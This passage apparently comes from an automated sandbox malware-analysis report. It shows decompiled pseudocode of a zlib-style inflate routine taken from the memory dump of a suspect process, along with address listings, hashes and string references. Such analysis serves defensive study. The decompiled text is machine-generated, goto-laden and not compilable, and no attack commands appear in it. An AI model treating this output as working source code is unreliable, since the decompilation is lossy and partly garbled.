								_t399 = _t399 >> 3 >> _t419;
								_t424 = 1;
								_t434 = _t436 - _t419;
								 *_t438 = 1;
								_v8 = _t399;
								goto L95;
							case 0xb:
								L11:
								__eax = __ebx;
								__eax = E29D89FF0(__ebx, 9, 5, 0x29dcdfa0, 0x29dcefa0);
								 *(__esi + 4) = __eax;
								__eflags = __eax;
								if(__eax == 0) {
									_push(0xfffffffc);
									L97:
									_t438[8] = _v8;
									_t438[7] = _t434;
									_t405[1] = _v16;
									goto L98;
								} else {
									_v8 = _v8 >> 3;
									__edi = __edi - 3;
									 *__esi = 6;
									L93:
									__eax = _v8;
									goto L94;
								}
								goto L124;
							case 0xc:
								L13:
								__eax = __eax >> 3;
								_v8 = __eax;
								__edi = __edi - 3;
								 *__esi = 3;
								L94:
								_t424 = 1;
								goto L95;
							case 0xd:
								L103:
								_v8 = _v8 >> 3;
								 *__esi = 9;
								 *(__ebx + 0x18) = "invalid block type";
								 *(__esi + 0x20) = _v8 >> 3;
								__eax = _v16;
								 *(__esi + 0x1c) = __edi;
								 *(__ebx + 4) = _v16;
								_push(0xfffffffd);
								L98:
								_t400 = _v12;
								_t414 = _t400 -  *_t405;
								 *_t405 = _t400;
								L99:
								_t405[2] = _t405[2] + _t414;
								_t438[0xd] = _v20;
								return E29D89EF0(_t405, _t438);
								goto L124;
						}
						L95:
						_t411 =  *_t438;
					} while (_t411 <= 9);
					goto L96;
				}
				L124:
			}























                                        0x29d8a7a7
                                        0x29d8a7ac
                                        0x29d8a7b1
                                        0x29d8a7b4
                                        0x29d8a7b7
                                        0x29d8a7ba
                                        0x29d8a7bd
                                        0x29d8a7c1
                                        0x29d8a7c4
                                        0x29d8a7c7
                                        0x29d8a7cc
                                        0x29d8a7dc
                                        0x29d8a7de
                                        0x29d8a7ce
                                        0x29d8a7d0
                                        0x29d8a7d5
                                        0x29d8a7d5
                                        0x29d8a7e3
                                        0x29d8a7e6
                                        0x29d8a7eb
                                        0x29d8ae89
                                        0x29d8ae89
                                        0x00000000
                                        0x29d8a7f1
                                        0x29d8a7f1
                                        0x29d8a7f1
                                        0x00000000
                                        0x29d8a7fb
                                        0x29d8a830
                                        0x29d8a832
                                        0x29d8a83a
                                        0x29d8a83c
                                        0x29d8a842
                                        0x00000000
                                        0x29d8a848
                                        0x29d8a848
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8a848
                                        0x29d8a7fd
                                        0x29d8a7fd
                                        0x29d8a807
                                        0x29d8a812
                                        0x29d8a814
                                        0x29d8a817
                                        0x29d8a81e
                                        0x29d8a820
                                        0x29d8a825
                                        0x29d8a828
                                        0x29d8a82e
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8a82e
                                        0x00000000
                                        0x29d8a7fd
                                        0x00000000
                                        0x00000000
                                        0x29d8a8b6
                                        0x29d8a8b9
                                        0x29d8a8ee
                                        0x29d8a8ee
                                        0x29d8a8f0
                                        0x29d8a8f2
                                        0x29d8a8f8
                                        0x29d8a8fb
                                        0x29d8a8fd
                                        0x29d8af0c
                                        0x29d8af12
                                        0x29d8af19
                                        0x00000000
                                        0x29d8a903
                                        0x29d8a903
                                        0x29d8a905
                                        0x29d8a907
                                        0x29d8a90a
                                        0x29d8a90d
                                        0x29d8a90f
                                        0x29d8a920
                                        0x29d8a922
                                        0x29d8a924
                                        0x29d8a927
                                        0x29d8a911
                                        0x29d8a911
                                        0x29d8a916
                                        0x29d8a916
                                        0x00000000
                                        0x29d8a90f
                                        0x29d8a8bb
                                        0x29d8a8bb
                                        0x29d8a8bb
                                        0x29d8a8bf
                                        0x00000000
                                        0x00000000
                                        0x29d8a8c5
                                        0x29d8a8c8
                                        0x29d8a8cb
                                        0x29d8a8ce
                                        0x29d8a8d0
                                        0x29d8a8d2
                                        0x29d8a8d5
                                        0x29d8a8dc
                                        0x29d8a8de
                                        0x29d8a8e3
                                        0x29d8a8e6
                                        0x29d8a8e9
                                        0x29d8a8ec
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8a8ec
                                        0x00000000
                                        0x29d8a8bb
                                        0x00000000
                                        0x00000000
                                        0x29d8a92e
                                        0x29d8a932
                                        0x29d8af04
                                        0x29d8af04
                                        0x29d8af07
                                        0x00000000
                                        0x29d8a938
                                        0x29d8a938
                                        0x29d8a93c
                                        0x29d8a9c8
                                        0x29d8a9c8
                                        0x29d8a9cb
                                        0x29d8a9ce
                                        0x29d8a9d5
                                        0x29d8a9d8
                                        0x29d8a9da
                                        0x29d8a9dc
                                        0x29d8a9de
                                        0x29d8a9de
                                        0x29d8a9e1
                                        0x29d8a9e4
                                        0x29d8a9e6
                                        0x29d8a9e8
                                        0x29d8a9e8
                                        0x29d8a9eb
                                        0x29d8a9ee
                                        0x29d8a9f1
                                        0x29d8a9f7
                                        0x29d8a9fc
                                        0x29d8a9ff
                                        0x29d8aa02
                                        0x29d8aa05
                                        0x29d8aa08
                                        0x29d8aa0e
                                        0x29d8aa0e
                                        0x29d8aa0e
                                        0x29d8aa11
                                        0x29d8aa14
                                        0x29d8aa1d
                                        0x29d8aa1f
                                        0x29d8aa21
                                        0x29d8aa24
                                        0x29d8aa24
                                        0x00000000
                                        0x29d8a942
                                        0x29d8a942
                                        0x29d8a945
                                        0x29d8a948
                                        0x29d8a96c
                                        0x29d8a96c
                                        0x29d8a96f
                                        0x29d8a973
                                        0x29d8a976
                                        0x29d8a97b
                                        0x29d8a97e
                                        0x29d8a981
                                        0x29d8a987
                                        0x29d8a98a
                                        0x29d8a98c
                                        0x29d8a995
                                        0x29d8a998
                                        0x29d8a998
                                        0x29d8a98e
                                        0x29d8a990
                                        0x29d8a992
                                        0x29d8a992
                                        0x29d8a99a
                                        0x29d8a99d
                                        0x29d8a9a0
                                        0x29d8a9a3
                                        0x29d8a9a5
                                        0x29d8a9a8
                                        0x29d8a9aa
                                        0x29d8a9ac
                                        0x29d8a9af
                                        0x29d8a9b9
                                        0x29d8a9b9
                                        0x29d8a9bb
                                        0x29d8a9b1
                                        0x29d8a9b1
                                        0x29d8a9b4
                                        0x29d8a9b4
                                        0x29d8a9af
                                        0x29d8a9aa
                                        0x29d8a9be
                                        0x29d8a9c2
                                        0x29d8af20
                                        0x29d8af23
                                        0x29d8af26
                                        0x29d8af29
                                        0x29d8af2c
                                        0x29d8af33
                                        0x29d8af35
                                        0x29d8af38
                                        0x29d8af3b
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8a94a
                                        0x29d8a94a
                                        0x29d8a94d
                                        0x29d8a950
                                        0x29d8a952
                                        0x00000000
                                        0x29d8a954
                                        0x29d8a954
                                        0x29d8a957
                                        0x29d8a961
                                        0x29d8a961
                                        0x29d8a963
                                        0x29d8a965
                                        0x29d8a959
                                        0x29d8a959
                                        0x29d8a95b
                                        0x29d8a95c
                                        0x29d8a95c
                                        0x29d8a968
                                        0x29d8a96a
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8a96a
                                        0x29d8a952
                                        0x29d8a948
                                        0x29d8a93c
                                        0x00000000
                                        0x00000000
                                        0x29d8aa2b
                                        0x29d8aa2e
                                        0x29d8aa63
                                        0x29d8aa63
                                        0x29d8aa68
                                        0x29d8aa6a
                                        0x29d8aa6d
                                        0x29d8aa70
                                        0x29d8aa73
                                        0x29d8af8c
                                        0x29d8af8c
                                        0x29d8af92
                                        0x00000000
                                        0x29d8aa79
                                        0x29d8aa79
                                        0x29d8aa7c
                                        0x29d8aa7f
                                        0x29d8aa82
                                        0x00000000
                                        0x29d8aa88
                                        0x29d8aa88
                                        0x29d8aa8b
                                        0x29d8aa92
                                        0x29d8aa95
                                        0x29d8aa97
                                        0x29d8aa98
                                        0x29d8aa99
                                        0x29d8aa9b
                                        0x29d8aa9e
                                        0x29d8aaa1
                                        0x29d8aaa3
                                        0x00000000
                                        0x29d8aaa9
                                        0x29d8aaa9
                                        0x29d8aaad
                                        0x29d8aab0
                                        0x29d8aab0
                                        0x29d8aab3
                                        0x29d8aaba
                                        0x29d8aac0
                                        0x00000000
                                        0x29d8aac0
                                        0x29d8aaa3
                                        0x29d8aa82
                                        0x29d8aa30
                                        0x29d8aa30
                                        0x29d8aa30
                                        0x29d8aa34
                                        0x00000000
                                        0x00000000
                                        0x29d8aa3a
                                        0x29d8aa3d
                                        0x29d8aa40
                                        0x29d8aa43
                                        0x29d8aa45
                                        0x29d8aa47
                                        0x29d8aa4a
                                        0x29d8aa51
                                        0x29d8aa53
                                        0x29d8aa58
                                        0x29d8aa5b
                                        0x29d8aa5e
                                        0x29d8aa61
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8aa61
                                        0x00000000
                                        0x29d8aa30
                                        0x00000000
                                        0x00000000
                                        0x29d8aac5
                                        0x29d8aac8
                                        0x29d8aacb
                                        0x29d8aace
                                        0x29d8aad1
                                        0x29d8ab40
                                        0x29d8ab40
                                        0x29d8ab45
                                        0x29d8ab48
                                        0x29d8ab50
                                        0x29d8ab53
                                        0x29d8ab5a
                                        0x29d8ab5d
                                        0x29d8ab64
                                        0x29d8ab67
                                        0x29d8ab67
                                        0x29d8ab6c
                                        0x29d8ab70
                                        0x29d8ab73
                                        0x29d8ab78
                                        0x29d8ab7e
                                        0x29d8ab82
                                        0x29d8ab8a
                                        0x29d8ab8d
                                        0x29d8ab8f
                                        0x29d8afcb
                                        0x29d8afcf
                                        0x29d8afd1
                                        0x29d8afd4
                                        0x29d8afd7
                                        0x29d8afda
                                        0x29d8afdb
                                        0x29d8afdc
                                        0x29d8afde
                                        0x29d8afe1
                                        0x29d8afe1
                                        0x29d8afe7
                                        0x29d8afea
                                        0x29d8afed
                                        0x29d8aff0
                                        0x29d8aff3
                                        0x29d8aff6
                                        0x29d8affd
                                        0x29d8afff
                                        0x29d8b002
                                        0x00000000
                                        0x29d8ab95
                                        0x29d8ab95
                                        0x29d8ab98
                                        0x29d8ab9b
                                        0x00000000
                                        0x29d8ab9b
                                        0x29d8aad3
                                        0x29d8aad3
                                        0x29d8aad3
                                        0x29d8aad6
                                        0x00000000
                                        0x29d8aad8
                                        0x29d8aad8
                                        0x29d8aad8
                                        0x29d8aadc
                                        0x00000000
                                        0x00000000
                                        0x29d8aae2
                                        0x29d8aae8
                                        0x29d8aaeb
                                        0x29d8aaed
                                        0x29d8aaef
                                        0x29d8aaf2
                                        0x29d8aaf9
                                        0x29d8aafb
                                        0x29d8ab00
                                        0x29d8ab03
                                        0x29d8ab06
                                        0x29d8ab09
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8ab09
                                        0x00000000
                                        0x29d8aad8
                                        0x00000000
                                        0x29d8ab0b
                                        0x29d8ab0b
                                        0x29d8ab0e
                                        0x29d8ab15
                                        0x29d8ab1b
                                        0x29d8ab1e
                                        0x29d8ab21
                                        0x29d8ab26
                                        0x29d8ab2c
                                        0x29d8ab2f
                                        0x29d8ab32
                                        0x29d8ab35
                                        0x29d8ab38
                                        0x29d8ab3b
                                        0x29d8ab3b
                                        0x00000000
                                        0x29d8aad3
                                        0x00000000
                                        0x00000000
                                        0x29d8aba1
                                        0x29d8aba1
                                        0x29d8aba6
                                        0x29d8aba9
                                        0x29d8abaf
                                        0x29d8abaf
                                        0x29d8abb6
                                        0x29d8abb9
                                        0x29d8ad42
                                        0x29d8ad42
                                        0x29d8ad45
                                        0x29d8ad49
                                        0x29d8ad4d
                                        0x29d8ad55
                                        0x29d8ad5c
                                        0x29d8ad61
                                        0x29d8ad65
                                        0x29d8ad6a
                                        0x29d8ad70
                                        0x29d8ad77
                                        0x29d8ad7e
                                        0x29d8ad85
                                        0x29d8ad8d
                                        0x29d8ad90
                                        0x29d8ad92
                                        0x29d8b054
                                        0x29d8b058
                                        0x29d8b05a
                                        0x29d8b05d
                                        0x29d8b060
                                        0x29d8b063
                                        0x29d8b064
                                        0x29d8b065
                                        0x29d8b067
                                        0x29d8b06a
                                        0x29d8b06a
                                        0x29d8b070
                                        0x29d8b073
                                        0x29d8b076
                                        0x29d8b079
                                        0x29d8b07c
                                        0x29d8b081
                                        0x29d8b083
                                        0x29d8b086
                                        0x29d8b089
                                        0x29d8b089
                                        0x29d8b089
                                        0x29d8b08c
                                        0x29d8b08e
                                        0x29d8b092
                                        0x29d8b095
                                        0x29d8b09d
                                        0x29d8b09e
                                        0x29d8b0a3
                                        0x29d8ad98
                                        0x29d8ad98
                                        0x29d8ad9b
                                        0x29d8ad9e
                                        0x29d8ada0
                                        0x29d8ada2
                                        0x29d8ada3
                                        0x29d8ada5
                                        0x29d8ada8
                                        0x29d8adaa
                                        0x29d8af76
                                        0x29d8af76
                                        0x29d8af79
                                        0x29d8af7c
                                        0x29d8af7f
                                        0x29d8af82
                                        0x29d8af85
                                        0x00000000
                                        0x29d8adb0
                                        0x29d8adb0
                                        0x29d8adb6
                                        0x29d8adb9
                                        0x29d8adbc
                                        0x29d8adbf
                                        0x29d8adc2
                                        0x29d8adc8
                                        0x29d8adcb
                                        0x29d8adce
                                        0x29d8add1
                                        0x29d8add4
                                        0x29d8add7
                                        0x29d8adda
                                        0x29d8addb
                                        0x29d8addc
                                        0x29d8adde
                                        0x29d8ade1
                                        0x00000000
                                        0x29d8ade1
                                        0x29d8adaa
                                        0x29d8abbf
                                        0x29d8abbf
                                        0x29d8abc9
                                        0x29d8abc9
                                        0x29d8abcc
                                        0x29d8abce
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8abd0
                                        0x29d8abd0
                                        0x29d8abd0
                                        0x29d8abd4
                                        0x00000000
                                        0x00000000
                                        0x29d8abda
                                        0x29d8abe0
                                        0x29d8abe3
                                        0x29d8abe5
                                        0x29d8abe7
                                        0x29d8abea
                                        0x29d8abed
                                        0x29d8abf4
                                        0x29d8abf6
                                        0x29d8abfb
                                        0x29d8abfe
                                        0x29d8ac01
                                        0x29d8ac03
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8ac03
                                        0x29d8af41
                                        0x29d8af41
                                        0x29d8af44
                                        0x29d8af47
                                        0x29d8af4a
                                        0x29d8af4d
                                        0x29d8af50
                                        0x29d8af52
                                        0x29d8af54
                                        0x29d8af56
                                        0x29d8af59
                                        0x29d8af59
                                        0x29d8af59
                                        0x29d8af5c
                                        0x29d8af64
                                        0x29d8af67
                                        0x29d8af6f
                                        0x29d8af70
                                        0x29d8af75
                                        0x00000000
                                        0x29d8ac05
                                        0x29d8ac05
                                        0x29d8ac0c
                                        0x29d8ac11
                                        0x29d8ac14
                                        0x29d8ac18
                                        0x29d8ac1b
                                        0x29d8ac1e
                                        0x29d8ac21
                                        0x29d8ac24
                                        0x29d8ac43
                                        0x29d8ac46
                                        0x29d8ac51
                                        0x29d8ac51
                                        0x29d8ac54
                                        0x29d8ac48
                                        0x29d8ac48
                                        0x29d8ac48
                                        0x29d8ac57
                                        0x29d8ac59
                                        0x29d8ac5f
                                        0x29d8ac66
                                        0x29d8ac69
                                        0x29d8ac6c
                                        0x29d8ac6f
                                        0x29d8ac72
                                        0x29d8ac74
                                        0x29d8acb3
                                        0x29d8acb3
                                        0x29d8acb6
                                        0x29d8acb8
                                        0x29d8acc2
                                        0x29d8acc4
                                        0x29d8acc7
                                        0x29d8accc
                                        0x29d8acce
                                        0x29d8acd1
                                        0x29d8acd4
                                        0x29d8acd9
                                        0x29d8acdc
                                        0x29d8ace2
                                        0x29d8ace2
                                        0x29d8acec
                                        0x29d8acee
                                        0x29d8acf0
                                        0x29d8b008
                                        0x29d8b008
                                        0x29d8b00b
                                        0x29d8b00e
                                        0x29d8b011
                                        0x29d8b012
                                        0x29d8b013
                                        0x29d8b015
                                        0x29d8b018
                                        0x29d8b01b
                                        0x29d8b01e
                                        0x29d8b024
                                        0x29d8b02b
                                        0x29d8b02e
                                        0x29d8b033
                                        0x29d8b035
                                        0x29d8b038
                                        0x29d8b03b
                                        0x29d8b03b
                                        0x29d8b03b
                                        0x29d8b03e
                                        0x29d8b042
                                        0x29d8b045
                                        0x29d8b04d
                                        0x29d8b04e
                                        0x29d8b053
                                        0x29d8acf6
                                        0x29d8acf6
                                        0x29d8acfa
                                        0x29d8ad0e
                                        0x29d8ad0e
                                        0x00000000
                                        0x29d8acfc
                                        0x29d8acfc
                                        0x29d8acff
                                        0x00000000
                                        0x29d8ad05
                                        0x29d8ad05
                                        0x29d8ad08
                                        0x29d8ad10
                                        0x29d8ad10
                                        0x29d8ad10
                                        0x29d8ad13
                                        0x29d8ad16
                                        0x29d8ad17
                                        0x29d8ad17
                                        0x29d8ad17
                                        0x29d8ad17
                                        0x29d8ad1c
                                        0x29d8ad1f
                                        0x00000000
                                        0x29d8ad1f
                                        0x29d8acff
                                        0x29d8acfa
                                        0x29d8ac76
                                        0x29d8ac76
                                        0x29d8ac80
                                        0x29d8ac80
                                        0x29d8ac84
                                        0x00000000
                                        0x00000000
                                        0x29d8ac8a
                                        0x29d8ac8d
                                        0x29d8ac90
                                        0x29d8ac93
                                        0x29d8ac95
                                        0x29d8ac97
                                        0x29d8ac9c
                                        0x29d8ac9f
                                        0x29d8aca2
                                        0x29d8aca4
                                        0x29d8acab
                                        0x29d8acae
                                        0x29d8acb1
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8acb1
                                        0x29d8aebb
                                        0x29d8aebe
                                        0x29d8aec1
                                        0x29d8aec1
                                        0x29d8aec4
                                        0x29d8aec9
                                        0x29d8aecb
                                        0x29d8aed0
                                        0x29d8aed7
                                        0x00000000
                                        0x29d8aed7
                                        0x29d8ac26
                                        0x29d8ac26
                                        0x29d8ac28
                                        0x29d8ac2a
                                        0x29d8ac2d
                                        0x29d8ac30
                                        0x29d8ac33
                                        0x29d8ac36
                                        0x29d8ac3b
                                        0x29d8ad24
                                        0x29d8ad24
                                        0x29d8ad29
                                        0x29d8ad2c
                                        0x29d8ad32
                                        0x29d8ad32
                                        0x29d8ad39
                                        0x29d8ad3c
                                        0x29d8abc6
                                        0x29d8abc9
                                        0x29d8abcc
                                        0x29d8abce
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8ad3c
                                        0x00000000
                                        0x29d8ac24
                                        0x29d8abc9
                                        0x00000000
                                        0x00000000
                                        0x29d8ade7
                                        0x29d8ade7
                                        0x29d8adea
                                        0x29d8aded
                                        0x29d8adf0
                                        0x29d8adf3
                                        0x29d8adf8
                                        0x29d8adfa
                                        0x29d8adfd
                                        0x29d8ae00
                                        0x29d8ae03
                                        0x29d8ae05
                                        0x29d8ae08
                                        0x29d8ae0c
                                        0x29d8ae0e
                                        0x29d8ae10
                                        0x29d8ae18
                                        0x29d8ae1b
                                        0x00000000
                                        0x29d8ae21
                                        0x29d8ae21
                                        0x29d8ae24
                                        0x29d8ae27
                                        0x29d8ae2a
                                        0x29d8ae2b
                                        0x29d8ae2c
                                        0x29d8ae35
                                        0x29d8ae38
                                        0x29d8ae3b
                                        0x29d8ae3d
                                        0x29d8ae40
                                        0x29d8ae43
                                        0x29d8ae46
                                        0x29d8ae49
                                        0x29d8ae4c
                                        0x29d8ae4f
                                        0x29d8ae52
                                        0x29d8ae55
                                        0x29d8ae57
                                        0x29d8ae5e
                                        0x29d8ae61
                                        0x29d8ae61
                                        0x29d8ae59
                                        0x29d8ae59
                                        0x29d8ae5b
                                        0x29d8ae5b
                                        0x29d8ae63
                                        0x29d8ae67
                                        0x29d8ae6a
                                        0x29d8b0a4
                                        0x00000000
                                        0x29d8ae70
                                        0x29d8ae70
                                        0x00000000
                                        0x29d8ae70
                                        0x29d8ae6a
                                        0x00000000
                                        0x00000000
                                        0x29d8b0aa
                                        0x29d8b0aa
                                        0x29d8b0ad
                                        0x29d8b0b1
                                        0x29d8b0b4
                                        0x29d8b0b9
                                        0x29d8b0bf
                                        0x29d8b0c2
                                        0x29d8b0c5
                                        0x29d8b0f8
                                        0x00000000
                                        0x29d8b0c7
                                        0x29d8b0c7
                                        0x29d8b0ca
                                        0x29d8b0cd
                                        0x29d8b0d0
                                        0x29d8b0d3
                                        0x29d8b0d6
                                        0x29d8b0d9
                                        0x29d8b0db
                                        0x29d8b0dd
                                        0x29d8b0df
                                        0x29d8b0e2
                                        0x29d8b0e2
                                        0x29d8b0e2
                                        0x29d8b0e5
                                        0x29d8b0e8
                                        0x29d8b0e9
                                        0x29d8b0f1
                                        0x29d8b0f2
                                        0x29d8b0f7
                                        0x29d8b0f7
                                        0x00000000
                                        0x00000000
                                        0x29d8b0fe
                                        0x29d8b0fe
                                        0x29d8b101
                                        0x29d8b104
                                        0x29d8b107
                                        0x29d8b10a
                                        0x29d8b10d
                                        0x00000000
                                        0x00000000
                                        0x29d8af99
                                        0x29d8af99
                                        0x29d8af9c
                                        0x29d8af9f
                                        0x29d8afa2
                                        0x29d8afa5
                                        0x29d8afa8
                                        0x29d8afaa
                                        0x29d8afac
                                        0x29d8afae
                                        0x29d8afb1
                                        0x29d8afb1
                                        0x29d8afb1
                                        0x29d8afb4
                                        0x29d8afb9
                                        0x29d8afbc
                                        0x29d8afc4
                                        0x29d8afc5
                                        0x29d8afca
                                        0x00000000
                                        0x00000000
                                        0x29d8a84f
                                        0x29d8a84f
                                        0x29d8a854
                                        0x29d8a85a
                                        0x29d8a85c
                                        0x29d8a861
                                        0x29d8a863
                                        0x29d8a865
                                        0x00000000
                                        0x00000000
                                        0x29d8a86d
                                        0x29d8a87b
                                        0x29d8a87d
                                        0x29d8a885
                                        0x29d8a888
                                        0x29d8a88a
                                        0x29d8aeda
                                        0x29d8ae8b
                                        0x29d8ae91
                                        0x29d8ae94
                                        0x29d8ae97
                                        0x00000000
                                        0x29d8a890
                                        0x29d8a890
                                        0x29d8a894
                                        0x29d8a897
                                        0x29d8ae76
                                        0x29d8ae76
                                        0x00000000
                                        0x29d8ae76
                                        0x00000000
                                        0x00000000
                                        0x29d8a8a2
                                        0x29d8a8a2
                                        0x29d8a8a5
                                        0x29d8a8a8
                                        0x29d8a8ab
                                        0x29d8ae79
                                        0x29d8ae79
                                        0x00000000
                                        0x00000000
                                        0x29d8aede
                                        0x29d8aee1
                                        0x29d8aee4
                                        0x29d8aeea
                                        0x29d8aef1
                                        0x29d8aef4
                                        0x29d8aefa
                                        0x29d8aefd
                                        0x29d8af00
                                        0x29d8ae9a
                                        0x29d8ae9a
                                        0x29d8ae9f
                                        0x29d8aea1
                                        0x29d8aea3
                                        0x29d8aea6
                                        0x29d8aea9
                                        0x29d8aeba
                                        0x00000000
                                        0x00000000
                                        0x29d8ae7e
                                        0x29d8ae7e
                                        0x29d8ae80
                                        0x00000000
                                        0x29d8a7f1
                                        0x00000000

                                        Strings
                                        • invalid bit length repeat, xrefs: 29D8B024
                                        • invalid stored block lengths, xrefs: 29D8AF12
                                        • too many length or distance symbols, xrefs: 29D8AF92
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: invalid bit length repeat$invalid stored block lengths$too many length or distance symbols
                                        • API String ID: 0-949635641
                                        • Opcode ID: ecfc5c5cded07abe5b3ba23e6cad47ab0144c18fd300b126a80c76ebc2894c39
                                        • Instruction ID: ae108b0f6f6cc4a7a2fd985e43bb87c8d83168e8240b224f5a618fce08ea9cb2
                                        • Opcode Fuzzy Hash: ecfc5c5cded07abe5b3ba23e6cad47ab0144c18fd300b126a80c76ebc2894c39
                                        • Instruction Fuzzy Hash: F16220B5A00605DFCB18CF69C590AAEBBF1FF88310F10856ED45A97B46E734AA42DF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D8C0E0 Relevance: 7.8, Strings: 6, Instructions: 288COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 95%
                                        			E29D8C0E0(signed char** __eax, void* __ecx) {
				signed char _v8;
				signed int* _t121;
				signed int _t122;
				unsigned int _t159;
				signed char** _t187;

				_t187 = __eax;
				if(__eax == 0) {
					L34:
					return 0xfffffffe;
				} else {
					_t121 =  *(__eax + 0x1c);
					if(_t121 != 0 &&  *((intOrPtr*)(__eax)) != 0) {
						_t122 =  *_t121;
						_t159 = 0xfffffffb;
						while(_t122 <= 0xd) {
							switch( *((intOrPtr*)(_t122 * 4 +  &M29D8C448))) {
								case 0:
									_t123 = _t187[1];
									if(_t123 == 0) {
										goto L36;
									} else {
										_t187[2] =  &(_t187[2][1]);
										_t187[1] = _t123 - 1;
										_t127 =  *( *_t187) & 0x000000ff;
										_t187[7][4] = _t127;
										 *_t187 =  &(( *_t187)[1]);
										_t159 = 0;
										if((_t127 & 0x0000000f) == 8) {
											_t129 = _t187[7];
											if((_t129[4] >> 4) + 8 <= _t129[0x10]) {
												 *_t129 = 1;
												goto L11;
											} else {
												 *_t129 = 0xd;
												_t187[6] = "invalid window size";
												goto L32;
											}
										} else {
											 *(_t187[7]) = 0xd;
											_t187[6] = "unknown compression method";
											_t187[7][4] = 5;
											goto L33;
										}
									}
									goto L50;
								case 1:
									L11:
									_t130 = _t187[1];
									if(_t130 == 0) {
										goto L36;
									} else {
										_t187[2] =  &(_t187[2][1]);
										_t194 = _t187[7];
										_t187[1] = _t130 - 1;
										_t132 =  *_t187;
										_t167 =  *_t132 & 0x000000ff;
										 *_t187 =  &(_t132[1]);
										_v8 = _t167;
										_t159 = 0;
										if(((_t194[4] << 8) + _t167) % 0x1f == 0) {
											if((_v8 & 0x00000020) != 0) {
												 *(_t187[7]) = 2;
												goto L38;
											} else {
												 *_t194 = 7;
												goto L33;
											}
										} else {
											 *_t194 = 0xd;
											_t187[6] = "incorrect header check";
											goto L32;
										}
									}
									goto L50;
								case 2:
									L38:
									_t138 = _t187[1];
									if(_t138 == 0) {
										goto L36;
									} else {
										_t187[2] =  &(_t187[2][1]);
										_t187[1] = _t138 - 1;
										_t187[7][8] = ( *( *_t187) & 0x000000ff) << 0x18;
										_t159 = 0;
										 *_t187 =  &(( *_t187)[1]);
										 *(_t187[7]) = 3;
										goto L40;
									}
									goto L50;
								case 3:
									L40:
									_t142 = _t187[1];
									if(_t142 == 0) {
										goto L36;
									} else {
										_t187[2] =  &(_t187[2][1]);
										_t187[1] = _t142 - 1;
										_t187[7][8] = _t187[7][8] + (( *( *_t187) & 0x000000ff) << 0x10);
										_t159 = 0;
										 *_t187 =  &(( *_t187)[1]);
										 *(_t187[7]) = 4;
										goto L42;
									}
									goto L50;
								case 4:
									L42:
									_t146 = _t187[1];
									if(_t146 == 0) {
										goto L36;
									} else {
										_t187[2] =  &(_t187[2][1]);
										_t187[1] = _t146 - 1;
										_t187[7][8] = _t187[7][8] + (( *( *_t187) & 0x000000ff) << 8);
										_t159 = 0;
										 *_t187 =  &(( *_t187)[1]);
										 *(_t187[7]) = 5;
										goto L44;
									}
									goto L50;
								case 5:
									L44:
									_t150 = _t187[1];
									if(_t150 == 0) {
										goto L36;
									} else {
										_t187[2] =  &(_t187[2][1]);
										_t187[1] = _t150 - 1;
										_t187[7][8] = _t187[7][8] + ( *( *_t187) & 0x000000ff);
										_t153 = _t187[7];
										 *_t187 =  &(( *_t187)[1]);
										_t187[0xc] = _t153[8];
										 *_t153 = 6;
										return 2;
									}
									goto L50;
								case 6:
									 *(__edi[7]) = 0xd;
									__eax = __edi[7];
									__edi[6] = "need dictionary";
									 *((intOrPtr*)(__edi[7] + 4)) = 0;
									__eax = 0xfffffffe;
									_pop(__edi);
									_pop(__esi);
									_pop(__ebx);
									return 0xfffffffe;
									goto L50;
								case 7:
									__ecx = __edi[7];
									__ecx =  *(__edi[7] + 0x14);
									__eax = __edi;
									__ebx = E29D8A7A0(__edi,  *(__edi[7] + 0x14), __ebx);
									if(__ebx != 0xfffffffd) {
										if(__ebx == 0) {
											__ebx = 0;
											goto L36;
										} else {
											if(__ebx != 1) {
												goto L36;
											} else {
												__ecx = __edi[7];
												__esi =  *((intOrPtr*)(__ecx + 0x14));
												__eax = __ecx + 4;
												__ebx = 0;
												__eax = E29D8A690(__ecx + 4, __edi,  *((intOrPtr*)(__ecx + 0x14)));
												__eax = __edi[7];
												if( *((intOrPtr*)(__eax + 0xc)) == 0) {
													 *__eax = 8;
													goto L23;
												} else {
													 *__eax = 0xc;
													goto L33;
												}
											}
										}
									} else {
										 *(__edi[7]) = 0xd;
										__eax = __edi[7];
										 *((intOrPtr*)(__edi[7] + 4)) = 0;
										goto L33;
									}
									goto L50;
								case 8:
									L23:
									__eax = __edi[1];
									if(__eax == 0) {
										goto L36;
									} else {
										__ecx =  *__edi;
										__edi[2] = __edi[2] + 1;
										__edi[1] = __eax;
										__eax = __edi[7];
										 *(__edi[7] + 8) = ( *( *__edi) & 0x000000ff) << 0x18;
										__ecx = __edi[7];
										__ebx = 0;
										 *__edi =  *__edi + 1;
										 *(__edi[7]) = 9;
										goto L25;
									}
									goto L50;
								case 9:
									L25:
									__eax = __edi[1];
									if(__eax == 0) {
										goto L36;
									} else {
										__edi[2] = __edi[2] + 1;
										__edi[1] = __eax;
										__ecx =  *( *__edi) & 0x000000ff;
										__eax = __edi[7];
										__ecx = ( *( *__edi) & 0x000000ff) << 0x10;
